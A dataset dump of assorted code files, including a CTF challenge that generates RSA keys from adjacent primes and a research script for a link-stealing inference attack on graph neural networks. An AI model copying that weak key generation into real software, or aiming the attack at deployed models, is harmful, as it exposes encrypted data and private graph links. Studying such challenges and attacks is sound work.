{"seq_id":"299990977","text":"Theatre_1 = {\"Name\":'Lviv',\n \"Seats_Number\":120,\n \"Actors_1\":[\"Andrew Kigan\",\"Jhon Speelberg\",\"Alan Mask\",\"Neil Bambino\"],\n \"Play_1\":[\"25/03/2018\",\"Aida\",80,\"Andrew Kigan\",\"Jhon Speelberg\",60,\"OK\"],\n \"Play_2\":[\"26/03/2018\",\"War\",220,\"Jhon Speelberg\",\"Jhon Speelberg\",\"Alan Mask\",\"Neil Bambino\",100,\"OK\"]\n }\nTheatre_2 = {\"Name\":'Sokil',\n \"Seats_Number\":110,\n \"Actors_2\":[\"Julia Portman\",\"Mary Lewis\",\"Carla Mask\",\"Neil Bambino\",\"Natalie Queen\"],\n \"Play_3\":[\"26/03/2018\",\"Rigoletto\",120,\"Mary Lewis\",\"Carla Mask\",\"Neil Bambino\",\"Natalie Queen\",80,\"OK\"],\n \"Play_4\":[\"27/03/2018\",\"Night Warriors\",90,\"Andrew Kigan\",\"Julia Portman\",\"Mary Lewis\",\"Carla Mask\",75,\"NO\"]\n }\n\n\nprint('Plays are: ' + str(Theatre_1[\"Play_1\"][1:2]) + ' ' + str(Theatre_1[\"Play_2\"][1:2]) + ' ' + str(Theatre_2[\"Play_3\"][1:2]) + ' ' + str(Theatre_2[\"Play_4\"][1:2]))\n\nprint('Number of actors of Lviv Theatre is : ' + str(len(Theatre_1[\"Actors_1\"])))\n\n\nOther_play = {\"Play_5\":[\"29/03/2018\",\"SomethingNew\",90,\"Andrew Kigan\",\"Julia Portman\",\"Carla Mask\",74,\"YES\"]}\nTheatre_2.update(Other_play)\n\nfree_tickets = Theatre_1.get(\"Play_1\")[2] - Theatre_1.get(\"Play_1\")[5]\nprint('Play ' + str(Theatre_1[\"Play_1\"][1:2]) + ', available tickets num = ' + str(free_tickets))\n\nprofit = 
Theatre_2.get(\"Play_3\")[7]\nprint('Play ' + str(Theatre_2[\"Play_3\"][1:2]) + ', profit = ' + str(profit))\n\n\nOne_more_ticket = {\"Play_4\":[\"27/03/2018\",\"Night Warriors\",90,\"Andrew Kigan\",\"Julia Portman\",\"Mary Lewis\",\"Carla Mask\",76,\"NO\"]}\nTheatre_2.update(One_more_ticket)\nprint(Theatre_2)\n","sub_path":"home_task_3_1.py","file_name":"home_task_3_1.py","file_ext":"py","file_size_in_byte":1680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"374343284","text":"from skimage import feature\nimport numpy as np\n\n\nclass LocalBinaryPatterns:\n def __init__(self, points, radius):\n self.points = points\n self.radius = radius\n\n def describe(self, image, eps=1e-7):\n # compute the rotation and grey-scale invariant form of LBPs (uniform)\n lbp = feature.local_binary_pattern(image, self.points, self.radius, method=\"uniform\")\n\n (hist, _) = np.histogram(lbp.ravel(), bins=np.arange(0, self.points + 2), range=(0, self.points + 1))\n\n # normalise the histogram\n hist = hist.astype(\"float\")\n hist /= (hist.sum() + eps)\n\n return hist\n","sub_path":"cbir/cvclasses/localbinarypatterns.py","file_name":"localbinarypatterns.py","file_ext":"py","file_size_in_byte":627,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"278269549","text":"from featureflow import Node, Aggregator\nimport os\nfrom soundfile import SoundFile\nimport requests\nimport json\nfrom urlparse import urlparse\n\n\nclass AudioMetaData(object):\n def __init__(\n self,\n uri=None,\n samplerate=None,\n channels=None,\n licensing=None,\n description=None,\n tags=None):\n super(AudioMetaData, self).__init__()\n self.uri = uri\n self.samplerate = samplerate\n self.channels = channels\n self.licensing = licensing\n self.description = description\n self.tags = tags\n\n def __eq__(self, other):\n return self.uri == other.uri \\\n and self.samplerate == other.samplerate \\\n and self.channels == other.channels \\\n and self.licensing == other.licensing \\\n and self.description == other.description \\\n and self.tags == other.tags\n\n\nclass AudioMetaDataEncoder(Aggregator, Node):\n content_type = 'application/json'\n\n def __init__(self, needs=None):\n super(AudioMetaDataEncoder, self).__init__(needs=needs)\n\n def _process(self, data):\n yield json.dumps({\n 'uri': data.uri.url\n if isinstance(data.uri, requests.Request) else data.uri,\n 'samplerate': data.samplerate,\n 'channels': data.channels,\n 'licensing': data.licensing,\n 'description': data.description,\n 'tags': data.tags\n })\n\n\nclass FreesoundOrgConfig(object):\n def __init__(self, api_key):\n super(FreesoundOrgConfig, self).__init__()\n self.api_key = api_key\n\n def request(self, _id):\n uri = 'http://freesound.org/apiv2/sounds/{_id}/'.format(_id=_id)\n params = {'token': self.api_key}\n metadata = requests.get(uri, params=params).json()\n request = requests.Request(\n method='GET',\n url=metadata['previews']['preview-hq-ogg'],\n params=params)\n return AudioMetaData(\n uri=request,\n samplerate=metadata['samplerate'],\n channels=metadata['channels'],\n licensing=metadata['license'],\n description=metadata['description'],\n tags=metadata['tags'])\n\n\nclass MetaData(Node):\n def __init__(self, needs=None):\n super(MetaData, self).__init__(needs=needs)\n\n @staticmethod\n def _is_url(s):\n if not isinstance(s, str):\n return False\n parsed = urlparse(s)\n return parsed.scheme and parsed.netloc\n\n @staticmethod\n def _is_local_file(s):\n try:\n 
return os.path.exists(s)\n except TypeError:\n return False\n\n @staticmethod\n def _is_file(s):\n try:\n s.tell()\n return True\n except AttributeError:\n return False\n\n def _process(self, data):\n if isinstance(data, AudioMetaData):\n yield data\n elif self._is_url(data):\n req = requests.Request(\n method='GET',\n url=data,\n headers={'Range': 'bytes=0-'})\n yield AudioMetaData(uri=req)\n elif isinstance(data, requests.Request):\n if 'range' not in data.headers:\n data.headers['range'] = 'bytes=0-'\n yield AudioMetaData(uri=data)\n elif self._is_local_file(data) or self._is_file(data):\n sf = SoundFile(data)\n yield AudioMetaData(\n uri=data,\n samplerate=sf.samplerate,\n channels=sf.channels)\n else:\n yield AudioMetaData(uri=data)\n","sub_path":"zounds/soundfile/audio_metadata.py","file_name":"audio_metadata.py","file_ext":"py","file_size_in_byte":3703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"619012945","text":"import os\nimport glob\nimport json\nimport xlrd # must install xlrd!\n\n\nclass Excel2Data(object):\n \"\"\"\n export data from excels\n \"\"\"\n # define types\n TYPE_INT32 = 'int32'\n TYPE_INT64 = 'int64'\n TYPE_FLOAT = 'float'\n TYPE_DOUBLE = 'double'\n TYPE_Bool = 'bool'\n TYPE_STRING = 'string'\n\n def __init__(self, filename, input_path='./', output_path='dist/'):\n \"\"\"\n :param filename: output filename\n :param input_path: relative path\n :param output_path: relative path, default 'dist'\n \"\"\"\n self.filename = filename\n self.input_path = input_path\n self.output_path = output_path\n self.excel_sheets = []\n self.class_files = []\n\n\n\n def make_json(self):\n \"\"\"\n export json format file from excel sheet\n :return: None\n \"\"\"\n\n curpath = os.path.abspath(os.getcwd())\n print('curdir:', curpath)\n\n inputpath = os.path.normpath(os.path.join(curpath, self.input_path))\n os.chdir(inputpath)\n excel_files = glob.glob('*.xlsx')\n\n jsondata = \"{\"\n for excel in excel_files:\n if '~' in excel:\n continue\n book = xlrd.open_workbook(inputpath+excel)\n print(\"The number of worksheets is\", book.nsheets)\n print(\"Worksheet name(s):\", book.sheet_names())\n\n # for in excel sheet\n listlenght = len(book.sheet_names())\n listindex = 0\n for sheetname in book.sheet_names():\n listindex += 1\n print('==sheet name:{0}=='.format(sheetname))\n\n msgname = sheetname.lower()\n\n sheet = book.sheet_by_name(sheetname) # get sheet content\n row = 0\n fileds = []\n\n jsondata += \"\\\"{0}\\\":{1}\".format(msgname, \"[\")\n for r in range(0, sheet.nrows):\n row += 1\n index = 0 # col index\n if row > 1:\n jsondata += \"{\"\n\n for c in range(0, sheet.ncols):\n # print (\"Cell:\", sheet.cell_value(rowx=r, colx=c) )\n data = sheet.cell_value(rowx=r, colx=c)\n\n if row == 1:\n parts = data.partition('.')\n # field_type = parts[0] # field type\n field_real = parts[2] # filed name\n # fileds[index]=field_real\n fileds.append(data)\n # print('field name:{0}'.format(field_real),)\n # sys.stdout.write('{0},'.format(field_real))\n else:\n # if type(data) is types.StringType:\n # data = data.encode('utf-8')\n # print('{0}:{1}'.format(fileds[index],data) )\n fieldname = fileds[index]\n parts = fieldname.partition('.')\n fieldtype = parts[0]\n fieldname = parts[2]\n if fieldtype == 'int':\n data = int(data)\n elif fieldtype == 'float':\n data = float(data)\n elif fieldtype == 'double':\n data = float(data)\n elif fieldtype == 'string':\n data = str(data)\n\n # sys.stdout.write('{0},'.format(data))\n\n if fieldtype == 
'string':\n                            jsondata += \"\\\"{0}\\\":\\\"{1}\\\"\".format(fieldname, data)\n                        else:\n                            jsondata += \"\\\"{0}\\\":{1}\".format(fieldname, data)\n                        if index < sheet.ncols-1:\n                            jsondata += \",\"\n\n                        index += 1\n                if row > 1:\n                    jsondata += \"}\"\n                    if row < sheet.nrows:\n                        jsondata += \",\"\n            jsondata += \"]\"\n            if listindex < listlenght:\n                jsondata += ','\n\n        jsondata += \"}\"\n        os.chdir(curpath)\n        print(\"json:\" + jsondata)\n        # io output\n        output = os.path.normpath(os.path.join(curpath, self.output_path))\n        output = os.path.join(output, self.filename + '.bin')\n        with open(output, 'w', encoding='utf-8') as targetf:\n            targetf.write(jsondata)\n        print(\"\\noutput:{0}\".format(output))\n\n        os.chdir(curpath)\n","sub_path":"datapacker/build/lib/datapacker/excel2data.py","file_name":"excel2data.py","file_ext":"py","file_size_in_byte":4785,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
{"seq_id":"21803208","text":"from .base import BaseEA\n\n\n# paper\n# Shi, Y., & Eberhart, R. C. (1999, July). Empirical study of particle swarm optimization.\n# In Proceedings of the 1999 Congress on Evolutionary Computation-CEC99 (Cat. No. 99TH8406) (Vol. 3, pp. 1945-1950).\n# IEEE.\nclass PSO(BaseEA):\n    def __init__(self, _np, n, upperxs, lowerxs, uppervs, lowervs, factors, **kwargs):\n        BaseEA.__init__(self, _np, n, upperxs, lowerxs, factors, **kwargs)\n        self.uppervs = uppervs\n        self.lowervs = lowervs\n\n        # 初始化速度\n        for i in range(self.np):\n            self.solutions[i].set_velocity(uppervs=self.uppervs, lowervs=self.lowervs)\n\n    def get_factor_keys(self):\n        return [\n            'w',\n            'r1',\n            'r2',\n        ]\n\n    def fit(self, gen):\n        for i in range(gen):\n            self.append_best_fitness()\n            best_solution = self.solutions[self.current_best_index]\n\n            w = self.factors['w'].generate(i)\n            r1 = self.factors['r1'].generate(i)\n            r2 = self.factors['r2'].generate(i)\n\n            for j in range(self.np):\n                self.solutions[j].update_velocity(best_solution.vector, w, r1, r2)\n                self.solutions[j].amend_velocity(self.uppervs, self.lowervs, boundary_strategy=self.boundary_strategy)\n                self.solutions[j].update_vector()\n                self.solutions[j].amend_vector(self.upperxs, self.lowerxs, boundary_strategy=self.boundary_strategy)\n                self.solutions[j].p_vector = self.compare(self.solutions[j].p_vector, self.solutions[j].vector)\n\n    def compare(self, v1, v2):\n        f1 = self.ff(v1)\n        f2 = self.ff(v2)\n\n        if (self.optimal_minimal and f1 < f2) or (not self.optimal_minimal and f1 > f2):\n            return v1\n\n        return v2\n","sub_path":"eas/PSO.py","file_name":"PSO.py","file_ext":"py","file_size_in_byte":1789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
{"seq_id":"47489237","text":"from django.contrib import admin\nfrom lottery.models import Question, Prize, LotteryRecord,PrizeConfiguration,Coupon, LotteryConfiguration\nfrom django.contrib.admin import DateFieldListFilter\n\nclass QuestionAdmin(admin.ModelAdmin):\n\tlist_display = ('question','answer')\n\tordering = ('id',)\n\nclass PrizeAdmin(admin.ModelAdmin):\n\tlist_display = ('name','quantity','use_count')\n\tordering = ('id',)\n\nclass CouponAdmin(admin.ModelAdmin):\n\tlist_display = ('name','code','status')\n\tsearch_fields = ('name','code', 'status')\n\nclass LotteryRecordAdmin(admin.ModelAdmin):\n\tlist_display = ('username','mobile','level','ip','format_lottery_time','prize_name','format_comedate','format_identity')\n\tsearch_fields = ('username','mobile', 'prize_name')\n\tlist_filter = (\n        ('lottery_time', DateFieldListFilter),\n    
)\n\tdef format_lottery_time(self,obj):\n\t\treturn obj.lottery_time.strftime('%Y-%m-%d, %H:%M:%S')\n\tdef format_comedate(self,obj):\n\t\tif obj.comedate is None:\n\t\t\treturn ''\n\t\telse:\n\t\t\treturn obj.comedate.strftime('%Y-%m-%d')\n\tdef format_identity(self,obj):\n\t\tif obj.identity is None:\n\t\t\treturn ''\n\t\telse:\n\t\t\treturn obj.identity\n\t\t\n\nclass PrizeConfigurationAdmin(admin.ModelAdmin):\n\tlist_display = ('prize','lottery_date','count','use_count')\n\tdef lottery_date(self,obj):\n\t\treturn obj.date.strftime('%Y-%m-%d')\n\tlist_filter = (\n ('date', DateFieldListFilter),\n )\n\t\nclass LotteryConfigurationAdmin(admin.ModelAdmin):\n\tlist_display = ('type','string_value','int_value')\n\tsearch_fields = ('type','string_value','int_value')\n\t\n\n\nadmin.site.register(Question,QuestionAdmin)\nadmin.site.register(Prize,PrizeAdmin)\nadmin.site.register(LotteryRecord,LotteryRecordAdmin)\nadmin.site.register(PrizeConfiguration,PrizeConfigurationAdmin)\nadmin.site.register(Coupon,CouponAdmin)\nadmin.site.register(LotteryConfiguration,LotteryConfigurationAdmin);\n","sub_path":"lottery/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"599754248","text":"import json\nimport bcrypt\nimport jwt\nfrom pprint import pprint\n\nfrom .views import *\nfrom advertisement.models import *\nfrom quiz.models import *\nfrom user.models import *\nfrom adwards.settings import SECRET_KEY\n\nfrom django.test import TestCase, Client\n\nclass QuizModelTest(TestCase):\n def setUp(self):\n industry_type = IndustryType.objects.create(\n id=1,\n name='교육사업'\n )\n ad_category = AdvertisementCategory.objects.create(\n id=1,\n name='교육'\n )\n tag = Tag.objects.create(\n id=1,\n name='coding bootcamp'\n )\n bytes_pw = bytes('1234', 'utf-8')\n hashed_pw = bcrypt.hashpw(bytes_pw, bcrypt.gensalt())\n advertiser = Advertiser.objects.create(\n id=1,\n email='wecode@grace.co',\n password=hashed_pw.decode('utf-8'),\n company_name='wecode',\n balance='1000000',\n business_license_number='10-345630291-01',\n industry_type=industry_type,\n contact='010-0000-0000',\n company_address='서울특별시 강남구 삼성동 테헤란로 427',\n company_description='3개월만에 개발자! 될 수 있습니다. 
코딩부트캠프 wecode!',\n homepage='https://wecode.co.kr',\n thumbnail='https://s3.ap-northeast-2.amazonaws.com/cdn.wecode.co.kr/landing/bootcamp/boot_4.jpg',\n )\n advertisement = Advertisement.objects.create(\n id=1,\n title='3개월만에 개발자?',\n description='개발자가 되는 가장 빠른 길, wecode!',\n advertiser=advertiser,\n ad_category=ad_category,\n video_link='https://youtu.be/h_XWL253eEY',\n budget='100000',\n price_per_view='100',\n switch=True\n )\n advertisement_tag = AdvertisementTag(\n id=1,\n advertisement=advertisement,\n tag=tag\n )\n question_type = QuestionType.objects.create(\n id=2,\n name='multi_choices'\n )\n answer_type = AnswerType.objects.create(\n id=2,\n name='multi_answer'\n )\n questions = Question.objects.create(\n id = 1,\n advertisement = advertisement,\n question_type = question_type,\n answer_type = answer_type,\n title = '위코드',\n content = '현재 교육중인 기수는 3기다.'\n )\n questions_2 = Question.objects.create(\n id = 2,\n advertisement = advertisement,\n question_type = question_type,\n answer_type = answer_type,\n title = '위코드',\n content = '현재 교육중인 기수는 몇명일까요?'\n )\n choices_1 = Choices.objects.create(\n id = 1,\n question = questions,\n content = 'o'\n )\n choices_2 = Choices.objects.create(\n id = 2,\n question = questions,\n content = 'x'\n )\n choices_3 = Choices.objects.create(\n id = 3,\n question = questions_2,\n content = '12'\n )\n choices_4 = Choices.objects.create(\n id = 4,\n question = questions_2,\n content = '15'\n )\n choices_5 = Choices.objects.create(\n id = 5,\n question = questions_2,\n content = '20'\n )\n choices_6 = Choices.objects.create(\n id = 6,\n question = questions_2,\n content = '21'\n )\n\n answer = Answer.objects.create(question = questions, choices_id=1)\n answers = [\n Answer(question = questions_2, choices_id=choice)\n for choice in [3, 4]\n ]\n answer_2 = Answer.objects.bulk_create(answers)\n \n state = State.objects.create(id = 1, name = \"서울\")\n gender = Gender.objects.create(id = 1, name = \"남자\")\n bank = Bank.objects.create(id = 1, name = \"우리은행\")\n bytes_pw = bytes('1234', 'utf-8')\n hashed_pw = bcrypt.hashpw(bytes_pw, bcrypt.gensalt())\n user = User.objects.create(\n id = 1,\n user_name = \"한바름\",\n nickname = \"별명\",\n email = \"mail@mail.com\",\n password = hashed_pw.decode('utf-8'),\n age = 30,\n state_id = 1,\n gender_id = 1,\n cellphone = '01012341234',\n thumbnail = \"https://www.notion.so/Django-test-py-8e2b1605e5864357bcd05971f23f686d\",\n bank_id = 1,\n account_owner = \"한바름\",\n account_number = \"010010010\",\n )\n interests = [\n InterestsType(pk = id, name = interest)\n for id, interest in zip(range(1,4), ['코딩','컴퓨터', '위워크', '위코드'])\n ]\n InterestsType.objects.bulk_create(interests)\n for interest in interests:\n user.interests.add(interest)\n \n def test_question_create_view_positive(self):\n c = Client()\n \n login_test = {\n \"email\":\"wecode@grace.co\",\n \"password\":\"1234\"\n }\n\n test = {\n \"ad_id\":1,\n \"quizzes\":\n [\n {\n 'title':'hello_wecode',\n 'content':'wecode는 현재 교육중인 기수는 3기이다.',\n 'choices':['o','x'],\n 'answers':['o']\n }\n ]\n }\n\n login_response = c.post(\"/signin/advertiser\", data=json.dumps(login_test), content_type=\"application/json\")\n access_token = login_response.json()[\"access_token\"]\n response = c.post(\"/quiz\", data=json.dumps(test), HTTP_AUTHORIZATION=access_token, content_type='application/json')\n self.assertEqual(response.status_code, 200)\n \n def test_question_create_view_negative(self):\n c = Client()\n \n login_test = {\n \"email\":\"wecode@grace.co\",\n \"password\":\"1234\"\n 
}\n\n test = {\n \"ad_id\":1,\n \"quizzes\":\n [\n {\n 'title':'hello_wecode',\n 'content':'wecode는 현재 교육중인 기수는 3기이다.',\n 'choices':['o','x'],\n 'answers':['o']\n },\n {\n 'title':'hello_wecode',\n 'content':'wecode는 현재 교육중인 기수는 3기이다.',\n 'choices':['o','x'],\n 'answers':['o']\n }\n ]\n }\n\n login_response = c.post(\"/signin/advertiser\", data=json.dumps(login_test), content_type=\"application/json\")\n access_token = login_response.json()[\"access_token\"]\n response = c.post(\"/quiz\", data=json.dumps(test), HTTP_AUTHORIZATION=access_token, content_type='application/json')\n self.assertEqual(response.status_code, 200) \n\n def test_question_correct_view_positive(self):\n c = Client()\n \n login_test = {\n \"email\":\"mail@mail.com\",\n \"password\":\"1234\"\n }\n\n test = {\n \"ad_id\":1,\n \"user_answers\": [\n {\"quiz_id\": 1, \"answers\": [1]},\n {\"quiz_id\": 2, \"answers\": [3,4]}\n ]\n }\n \n login_response = c.post(\"/signin/user\", data=json.dumps(login_test), content_type=\"application/json\")\n access_token = login_response.json()[\"access_token\"]\n response = c.post(\"/quiz/answer\", data=json.dumps(test), HTTP_AUTHORIZATION=access_token, content_type='application/json')\n self.assertEqual(response.status_code, 200)\n self.assertEqual(response.json(), {\"message\":True})\n \n def test_question_correct_view_negaitive(self):\n c = Client()\n \n login_test = {\n \"email\":\"mail@mail.com\",\n \"password\":\"1234\"\n }\n\n test = {\n \"ad_id\":1,\n \"user_answers\": [\n {\"quiz_id\": 1, \"answers\": [1]},\n {\"quiz_id\": 2, \"answers\": [3,4,5]}\n ]\n }\n\n login_response = c.post(\"/signin/user\", data=json.dumps(login_test), content_type=\"application/json\")\n access_token = login_response.json()[\"access_token\"]\n response = c.post(\"/quiz/answer\", data=json.dumps(test), HTTP_AUTHORIZATION=access_token, content_type='application/json')\n self.assertEqual(response.status_code, 200)\n self.assertEqual(response.json(), {\"message\":False})\n\n def test_question_list_view_positive(self):\n c = Client()\n\n response = c.get(\"/advertisement/1/quiz\", content_type='application/json')\n pprint(response.json())\n self.assertEqual(response.status_code, 200)\n\n def test_question_list_view_negative(self):\n c = Client()\n\n response = c.get(\"/advertisement/10/quiz\", content_type='application/json')\n pprint(response.json())\n self.assertEqual(response.json(), [])\n","sub_path":"quiz/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":9880,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"117181314","text":"from patchNoteExtractor import PatchNoteExtractor\nfrom totalLinkExtractor import DotaLinkExtractor\nimport time\n\nif __name__ == \"__main__\":\n totalLinks = []\n count = 0\n #Start here\n fileName = \"../htmlData/dota\" + str(count) + \".html\"\n print(\"Extracting\")\n dle = DotaLinkExtractor(\"http://dota2.gamepedia.com\",\"/Category:Patches\",fileName)\n data = dle.scrape()\n totalLinks = data['allLinks']\n \n while data['nextPage']:\n print(\"Next Page\")\n count += 1\n fileName = \"../htmlData/dota\" + str(count) + \".html\"\n dle = DotaLinkExtractor(\"http://dota2.gamepedia.com\",data['nextPage'],fileName)\n data = dle.scrape()\n totalLinks += data['allLinks']\n \n #all the patch note links:\n print(\"Data Extracted: \",len(totalLinks))\n\n\n #Now for each patch note:\n patchNoteInformation = {}\n fileName = \"../htmlData/dotaPatchNote\"\n\n \n for x in totalLinks:\n dle = 
PatchNoteExtractor(\"http://dota2.gamepedia.com\",x,fileName)\n patchNoteInformation[x],readFile = dle.scrape()\n if not readFile:\n time.sleep(60)\n\n for x in patchNoteInformation.keys():\n print(x)\n for y in patchNoteInformation[x].keys():\n print(y)\n print(patchNoteInformation[x][y])\n","sub_path":"py/dotaExtractor.py","file_name":"dotaExtractor.py","file_ext":"py","file_size_in_byte":1294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"189729348","text":"from Crypto.PublicKey import RSA\nfrom Crypto.Cipher import PKCS1_OAEP\nfrom sympy import randprime, nextprime, invert\n\np = randprime(2**1023, 2**1024)\nq = nextprime(p)\nn = p * q\ne = 65537\nphi = (p-1)*(q-1)\nd = int(invert(e, phi))\nkey = RSA.construct((n, e, d, p, q))\nrsa = PKCS1_OAEP.new(key)\nprint(n)\nprint(rsa.encrypt(open('./flag.txt', 'rb').read()))\n","sub_path":"EquinorCTF/Really Solid Algebra/rsa.py","file_name":"rsa.py","file_ext":"py","file_size_in_byte":353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"493595472","text":"from __future__ import print_function\nimport argparse\n\nimport keras\nfrom keras.models import Model\nfrom keras.layers import Dense, Dropout, Input\nfrom keras.optimizers import Adam\nfrom keras_utils import *\nfrom sklearn.metrics import precision_score, recall_score, roc_auc_score, accuracy_score\nimport json\nimport numpy as np\nfrom sklearn.metrics import roc_auc_score\nfrom sklearn.preprocessing import StandardScaler\nfrom scipy.spatial.distance import cosine, euclidean, correlation, chebyshev,\\\n braycurtis, canberra, cityblock, sqeuclidean\nfrom utils import kl_divergence, js_divergence, entropy\n\nbatch_size = 128\nnum_classes = 2\nepochs = 50\n\nparser = argparse.ArgumentParser()\n\nparser.add_argument(\n '--dataset1',\n type=str,\n default='citeseer',\n help='citeseer, cora or pubmed')\nparser.add_argument(\n '--dataset2', type=str, default='cora', help='citeseer, cora or pubmed')\nparser.add_argument(\n '--datapath', type=str, default=\"data/dataset/original/\", help=\"data path\")\nparser.add_argument(\n '--prediction_path',\n type=str,\n default='data/pred/',\n help='prediction saved path')\nparser.add_argument(\n '--partial_graph_path',\n type=str,\n default='data/partial_graph_with_id/',\n help='partial graph saved path')\nparser.add_argument('--ratio', type=str, default='0.5', help='(0.1,1.0,0.1)')\nparser.add_argument(\n '--operator',\n type=str,\n default='concate_all',\n help='average,hadamard,weighted_l1,weighted_l2,concate_all')\nparser.add_argument(\n '--metric_type',\n type=str,\n default='entropy',\n help='kl_divergence, js_divergence, entropy')\n\nargs = parser.parse_args()\ndataset1 = args.dataset1 # shadow model\ndataset2 = args.dataset2 # target model\ndatapath = args.datapath\nprediction_path = args.prediction_path\npartial_graph_path = args.partial_graph_path\nratio = args.ratio\noperator = args.operator\nmetric_type = args.metric_type\n\n\ndef average(a, b):\n return (a + b) / 2\n\n\ndef hadamard(a, b):\n return a * b\n\n\ndef weighted_l1(a, b):\n return abs(a - b)\n\n\ndef weighted_l2(a, b):\n return abs((a - b) * (a - b))\n\n\ndef concate_all(a, b):\n return np.concatenate(\n (average(a, b), hadamard(a, b), weighted_l1(a, b), weighted_l2(a, b)))\n\n\ndef operator_func(operator, a, b):\n if operator == \"average\":\n return average(a, b)\n elif operator == \"hadamard\":\n return hadamard(a, b)\n elif operator == \"weighted_l1\":\n return 
weighted_l1(a, b)\n elif operator == \"weighted_l2\":\n return weighted_l2(a, b)\n elif operator == \"concate_all\":\n return concate_all(a, b)\n\n\ndef get_metrics(a, b, metric_type, operator_func):\n if metric_type == \"kl_divergence\":\n s1 = np.array([kl_divergence(a, b)])\n s2 = np.array(kl_divergence(b, a))\n\n elif metric_type == \"js_divergence\":\n s1 = np.array([js_divergence(a, b)])\n s2 = np.array(js_divergence(b, a))\n\n elif metric_type == \"entropy\":\n s1 = np.array([entropy(a)])\n s2 = np.array([entropy(b)])\n else:\n raise ValueError(\"metric_type undefined\")\n\n return operator_func(operator, s1, s2)\n\n\ndef load_data(train_path1, test_path1, train_path2, test_path2):\n similarity_list = [cosine, euclidean, correlation, chebyshev,\n braycurtis, canberra, cityblock, sqeuclidean]\n x_train = []\n y_train = []\n x_test = []\n y_test = []\n train_data = open(train_path1).readlines() + \\\n open(test_path1).readlines() # all row from dataset1\n test_data = open(test_path2).readlines() # test set from dataset2\n for row in train_data:\n row = json.loads(row)\n\n # generate train_data from shadow dataset\n t0 = np.array(row[\"gcn_pred0\"])\n t1 = np.array(row[\"gcn_pred1\"])\n target_similarity = np.array([row(t0, t1) for row in similarity_list])\n metrics_vec = get_metrics(t0, t1, metric_type, operator_func)\n line = np.concatenate((target_similarity, metrics_vec))\n # line = metrics_vec\n # line = target_similarity\n line = np.nan_to_num(line)\n x_train.append(line)\n y_train.append(row[\"label\"])\n\n for row in test_data:\n row = json.loads(row)\n\n # generate train_data from shadow dataset\n t0 = np.array(row[\"gcn_pred0\"])\n t1 = np.array(row[\"gcn_pred1\"])\n target_similarity = np.array([row(t0, t1) for row in similarity_list])\n metrics_vec = get_metrics(t0, t1, metric_type, operator_func)\n line = np.concatenate((target_similarity, metrics_vec))\n # line = metrics_vec\n # line = target_similarity\n line = np.nan_to_num(line)\n\n # generate test_data from target datasetc\n x_test.append(line)\n y_test.append(row[\"label\"])\n return np.array(x_train), np.array(x_test), np.array(y_train), np.array(\n y_test)\n\n\n# the data, split between train and test sets\ntrain_path1 = partial_graph_path + \\\n \"%s_train_ratio_%s_train.json\" % (dataset1, ratio)\ntest_path1 = partial_graph_path + \\\n \"%s_train_ratio_%s_test.json\" % (dataset1, ratio)\ntrain_path2 = partial_graph_path + \\\n \"%s_train_ratio_%s_train.json\" % (dataset2, ratio)\ntest_path2 = partial_graph_path + \\\n \"%s_train_ratio_%s_test.json\" % (dataset2, \"0.9\")\n\nx_train, x_test, y_train, y_test = load_data(\n train_path1, test_path1, train_path2, test_path2)\nx_train = x_train.astype('float32')\nx_test = x_test.astype('float32')\nss = StandardScaler()\n# ms = MinMaxScaler()\nx_train = ss.fit_transform(x_train)\nx_test = ss.fit_transform(x_test)\n\nx_train_shape = x_train.shape[-1]\nx_test_shape = x_train_shape\n\nprint(x_train.shape[0], 'train samples')\nprint(x_test.shape[0], 'test samples')\n# convert class vectors to binary class matrices\ny_train = keras.utils.np_utils.to_categorical(y_train, num_classes)\ny_test = keras.utils.np_utils.to_categorical(y_test, num_classes)\n\ninput1 = Input(shape=(x_train_shape,))\nx1 = Dense(32, activation='relu')(input1)\nx1 = Dropout(0.5)(x1)\nx1 = Dense(32, activation='relu')(x1)\nx1 = Dropout(0.5)(x1)\nout = Dense(num_classes, activation='softmax')(x1)\nmodel = Model(inputs=input1, outputs=out)\n\nmodel.compile(\n loss=\"categorical_crossentropy\", 
optimizer=Adam())\n\n\nmodel.fit(\n x_train,\n y_train,\n batch_size=batch_size,\n epochs=epochs,\n validation_data=(x_test, y_test))\n\nscore = model.evaluate(x_test, y_test, verbose=0)\ny_pred = model.predict(x_test)\n\n# add precision recall score\ny_test_label = [row[1] for row in y_test]\ny_pred_label = [round(row[1]) for row in y_pred]\n\ntest_acc = accuracy_score(y_test_label, y_pred_label)\ntest_precision = precision_score(y_test_label, y_pred_label)\ntest_recall = recall_score(y_test_label, y_pred_label)\ntest_auc = roc_auc_score(y_test, y_pred)\nprint('Test accuracy:', test_acc)\nprint(\"Test Precision\", test_precision)\nprint(\"Test Recall\", test_recall)\nprint('Test auc:', test_auc)\n\nwith open(\"result/attack_1.txt\", \"a\") as wf:\n wf.write(\n \"%s,%s,%d,%0.5f,%0.5f,%0.5f,%s\\n\" %\n (dataset2, \"attack1_transfer_metrics_target:%s_shadow:%s\" %\n (dataset2, dataset1), epochs, test_precision, test_recall, test_auc, ratio))\n","sub_path":"stealing_link/attack_1.py","file_name":"attack_1.py","file_ext":"py","file_size_in_byte":7127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"100928412","text":"from .models import User, Schedule, FriendRequest, Notification, Course, Degree, College, CoursePriority, Preference, Day, Faculty, Building, Section, CourseOffering, Timeslot, Room, FlowchartTerm\n\ndef save_friend_request(sender, instance, **kwargs):\n if(instance.accepted and not(instance.notified)):\n Notification(category='Friend', content=instance.to_user.first_name+' accepted your friend request!', seen=False, to_user=instance.from_user).save()\n instance.notified = True\n instance.save()\n\n\ndef save_schedule(sender, instance, created, **kwargs):\n 